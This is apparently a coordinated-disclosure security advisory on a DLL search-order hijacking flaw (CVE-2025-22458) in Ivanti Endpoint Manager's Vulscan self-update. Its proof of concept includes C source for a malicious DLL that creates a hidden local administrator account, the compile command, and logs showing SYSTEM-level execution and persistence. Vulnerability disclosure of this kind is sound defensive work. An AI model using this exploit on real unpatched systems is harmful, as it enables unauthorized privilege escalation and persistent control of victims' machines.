📄 Ivanti Endpoint Manager DLL Hijacking / Privilege Escalation

SEC Consult Vulnerability Lab Security Advisory < 20250422-0 >
    =======================================================================
                  title: Local Privilege Escalation via DLL Search Order Hijacking
                product: Ivanti Endpoint Manager Security Scan (Vulscan) Self 
    Update
     vulnerable version: EPM 2022 SU6 and previous, EPM 2024
          fixed version: EPM 2022 SU7 and EPM 2024 SU1
             CVE number: CVE-2025-22458
                 impact: High
               homepage: https://www.ivanti.com/
                  found: 2025-02-07
                     by: Paul Serban (Eviden)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Eviden business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "EPM Patch and Compliance Manager uses an auto update feature in order to make
    sure that all vulnerability scanning files are up to date with the core 
    server.
    This ensures compatibility between the files and the latest definitions as 
    well
    as compatibility with the files on the core.  The Security Scan (Vulscan) is
    what does the update."
    
    Source: 
    https://forums.ivanti.com/s/article/About-Patch-Manager-Self-Update?language=en_US
    
    
    Business recommendation:
    ------------------------
    The vendor provides a patch which should be installed immediately.
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) DLL Search Order Hijacking (CVE-2025-22458)
    The EPM Security Scan (Vulscan) Self Update is vulnerable to DLL Hijacking.
    When it is installed on a client machine, by default, it creates a scheduled
    task as SYSTEM that when run, tries to load non-existent ZIP files from
    ProgramData. A malicious DLL can be inserted into one of the ZIP files which
    will be unzipped to and loaded from Program Files (x86) allowing malicious
    actors with low privileges to escalate to SYSTEM and due to the recurrence
    of the scheduled task, also gain persistence.
    
    
    Proof of concept:
    -----------------
    1) DLL Search Order Hijacking (CVE-2025-22458)
    In the screenshot below the scheduled task "LANDESK Agent Health Bootstrap 
    Task"
    is seen to be running as SYSTEM on the client machine.
    
    <01_scheduled_task_as_system.png>
    
    By default it is set to run daily at 9 PM.
    
    <02_scheduled_task_recurrence.png>
    
    This scheduled task runs the vulscan.exe binary that scans to make sure
    that all vulnerability scanning files are up to date with the core Ivanti
    server.
    
    <03_scheduled_task_command.png>
    
    Every scan run by this agent saves a log in the following location:
    
    C:\ProgramData\LANDesk\Log\vulscan.log
    
    The ProgramData folder allows any authenticated user to read and write
    into it. While reading the log, the following lines indicate that some
    files are not found.
    
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
    RebootBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
    AlertSettingsBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
    InventorySettingsBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
    ClientConnectivityBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    Thu, 10 Feb 2025 21:00:19 Info: Core did not find file 
    PortalManagerBehavior_Apply.zip
    Thu, 10 Feb 2025 21:00:19 Last status: File not found on core
    <snipped for brevity>
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
    "C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
    "C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
    "C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
    "C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 GetFileHash: could not find 
    "C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:19 Self update: files are up to date.
    
    It looks like it is trying to find certain zip archives. It first
    searches on the Core Ivanti server, then it looks in the ProgramData
    folder. Since it can't find them in either location, it concludes
    that it is up to date.
    
    Further down into the log it can be seen that it tries to unzip the
    same zip files from the ProgramData folder. It can't find them and
    then loads DLL files from Program Files (x86). These DLL files have
    the same name as the zip file.
    
    Thu, 10 Feb 2025 21:00:20 Checking whether to unzip 
    'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: true
    Thu, 10 Feb 2025 21:00:20 GetFileHash: could not find 
    "C:\ProgramData\vulScan\RebootBehavior_Apply.zip"
    Thu, 10 Feb 2025 21:00:20 Loading applier dll: 'C:\Program Files 
    (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
    Thu, 10 Feb 2025 21:00:20 Check last error after load library.  Error: 126
    Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 
    'C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip'.  Force: false
    Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find 
    "C:\ProgramData\vulScan\AlertSettingsBehavior_Apply.zip"
    Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files 
    (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:36 'PreApplyBehavior' is not in 'C:\Program Files 
    (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:36 Calling 'ApplyBehavior' in 'C:\Program Files 
    (x86)\LANDesk\LDClient\AlertSettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:36 Checking whether to unzip 
    'C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip'.  Force: false
    Tue, 10 Feb 2025 21:00:36 GetFileHash: could not find 
    "C:\ProgramData\vulScan\InventorySettingsBehavior_Apply.zip"
    Tue, 10 Feb 2025 21:00:36 Loading applier dll: 'C:\Program Files 
    (x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:37 'PreApplyBehavior' is not in 'C:\Program Files 
    (x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:37 Calling 'ApplyBehavior' in 'C:\Program Files 
    (x86)\LANDesk\LDClient\InventorySettingsBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:38 Checking whether to unzip 
    'C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip'.  Force: false
    Tue, 10 Feb 2025 21:00:38 GetFileHash: could not find 
    "C:\ProgramData\vulScan\ClientConnectivityBehavior_Apply.zip"
    Tue, 10 Feb 2025 21:00:38 Loading applier dll: 'C:\Program Files 
    (x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
    Tue, 10 Feb 2025 21:00:38 Calling 'PreApplyBehavior' in 'C:\Program Files 
    (x86)\LANDesk\LDClient\ClientConnectivityBehavior_Apply.dll'
    <snipped for brevity>
    Wed, 10 Feb 2025 21:01:42 Checking whether to unzip 
    'C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip'.  Force: false
    Wed, 10 Feb 2025 21:01:42 GetFileHash: could not find 
    "C:\ProgramData\vulScan\PortalManagerBehavior_Apply.zip"
    Wed, 10 Feb 2025 21:01:42 Loading applier dll: 'C:\Program Files 
    (x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
    Wed, 10 Feb 2025 21:01:44 'PreApplyBehavior' is not in 'C:\Program Files 
    (x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
    Wed, 10 Feb 2025 21:01:44 Calling 'ApplyBehavior' in 'C:\Program Files 
    (x86)\LANDesk\LDClient\PortalManagerBehavior_Apply.dll'
    
    The Program Files (x86) folder already contains all the DLL files it looks 
    for,
    with one exception. It doesn't contain the RebootBehavior_Apply.dll file.
    
    <04_rebootdll_missing.png>
    
    Because the zip files in question don't exist in ProgramData, a low privileged
    user can create them.
    
    <05_maliciousZIP_lowprivuser.png>
    
    The RebootBehavior_Apply.zip file could, for example, contain a 
    RebootBehavior_Apply.dll that,
    when loaded, will create a new user and add it to the local administrators 
    group.
    This was the chosen zip file name because it is the first one searched for by
    the scan. However, any of the other ones can be used. The DLL will still be
    created, the only difference will be that a second scan will be required for
    it to reach the stage where it tries to load RebootBehaviour_Apply.dll again.
    
    #include <windows.h>
    #include <stdlib.h>
    #include <stdio.h>
    
    void Entry() {
        system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");
        system("cmd.exe /C net localgroup administrators secconsult /add");
    }
    
    __declspec(dllexport) void PreApplyBehavior() {
        Entry();
    }
    
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID 
    lpReserved) {
        switch (ul_reason_for_call) {
            case DLL_PROCESS_ATTACH:
                CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
                break;
            case DLL_THREAD_ATTACH:
            case DLL_THREAD_DETACH:
            case DLL_PROCESS_DETACH:
                break;
        }
        return TRUE;
    }
    
    
    Notice the "PreApplyBehavior" exported function which just calls the malicious
    commands. This is a required function that is searched for when the 
    vulscan.exe
    tries to apply the DLL. It was compiled using the syntax below.
    
    i686-w64-mingw32-gcc poc.c -shared -o RebootBehavior_Apply.dll
    
    When the scheduled task runs, it finds the malicious ZIP file and successfully
    unzips it in 'C:\Program Files (x86)\LANDesk\LDClient\' and immediately loads 
    it.
    
    Tue, 11 Feb 2025 21:02:52 Checking whether to unzip 
    'C:\ProgramData\vulScan\RebootBehavior_Apply.zip'.  Force: false
    Tue, 11 Feb 2025 21:02:52 Unzipping
    Tue, 11 Feb 2025 21:02:52 Unzip 
    'C:\ProgramData\vulScan\RebootBehavior_Apply.zip' to directory 'C:\Program 
    Files (x86)\LANDesk\LDClient\'
    Tue, 11 Feb 2025 21:03:03 Successfully unzipped
    Tue, 11 Feb 2025 21:03:03 Loading applier dll: 'C:\Program Files 
    (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
    Tue, 11 Feb 2025 21:03:03 Calling 'PreApplyBehavior' in 'C:\Program Files 
    (x86)\LANDesk\LDClient\RebootBehavior_Apply.dll'
    
    The malicious DLL file was created as SYSTEM:
    
    <06_maliciousDLL_created_as_SYSTEM.png>
    
    Checking the local users, it is confirmed that the new secconsult local
    administrator has been created.
    
    <07_secconsult_user_created.png>
    
    As long as the malicious RebootBehavior_Apply.dll exists in
    'C:\Program Files (x86)\LANDesk\LDClient\', the scheduled task will try to
    load it each time thus giving an attacker a stealthy persistence mechanism.
    
    
    Vulnerable / tested versions:
    -----------------------------
    The following version has been tested which was the latest version available
    at the time of the test:
    * 11.0.5.2795
    
    Affected versions as indicated by the vendor are EMP 2024 and EPM 2022 SU6 and 
    all its previous versions.
    
    Vendor contact timeline:
    ------------------------
    2025-02-13: Contacting vendor via email.
    2025-02-18: Vendor confirmed that advisory was received.
    2025-02-19: Acknowledged the vendor response.
    2025-03-04: Asking for a status update.
    2025-03-04: Ivanti is working on a fix and testing it already, but will
                not make it as part of March Patch Tuesday.
    2025-03-24: Ivanti has developed a fix and plans to release it as part of
                April Patch Tuesday disclosures (4/8/25).
    2025-04-08: Vendor publishes security advisory
    2025-04-22: Coordinated disclosure of security advisory
    
    
    Solution:
    ---------
    The vendor provides a patch which can be downloaded from the following URL: 
    https://portal.ivanti.com.
    Vendor Advisory: 
    https://forums.ivanti.com/s/article/Security-Advisory-EPM-April-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Eviden business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: https://blog.sec-consult.com
    X: https://x.com/sec_consult
    
    EOF Paul Serban / @2025